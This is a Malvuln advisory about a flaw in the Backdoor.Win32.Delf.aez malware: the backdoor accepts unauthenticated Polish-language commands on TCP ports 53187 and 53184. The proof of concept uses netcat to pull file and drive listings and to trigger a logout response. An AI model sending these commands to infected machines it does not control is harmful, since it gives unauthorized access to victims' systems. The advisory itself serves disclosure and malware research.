Discovery / credits: Malvuln - (c) 2021 Original source: Contact: Media: Threat: Backdoor.Win32.Delf.aez Vulnerability: Unauthenticated Remote Command Execution Description: The malware listens on several TCP ports and accepts unauthenticated commands on port 53187 and 53184. Commands are in Polish E.g. Wylogowuj translated is "Log out" and we get response "#Zmiany Profilu w│aczone" ("#Profile change enabled."). Sending a single characters "d" or "f" to port 53187 also returns system information. Type: PE32 MD5: be4a6274679ca966a1d99140db54c25a Vuln ID: MVID-2021-0217 Disclosure: 05/17/2021 Exploit/PoC: nc64.exe x.x.x.x 53187 f f 6 PerfLogs Program Files Program Files (x86) Users Windows $WINRE_BACKUP_PARTITION.MARKER 0 bootmgr 398082 BOOTNXT 1 BOOTSECT.BAK 8192 pagefile.sys 671088640 swapfile.sys 16777216 d d C: - Dysk lokalny D: - CD-ROM nc64.exe x.x.x.x 53184 #Wylogowuj #Zmiany Profilu w│aczone. #Profile change enabled. Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) (TM).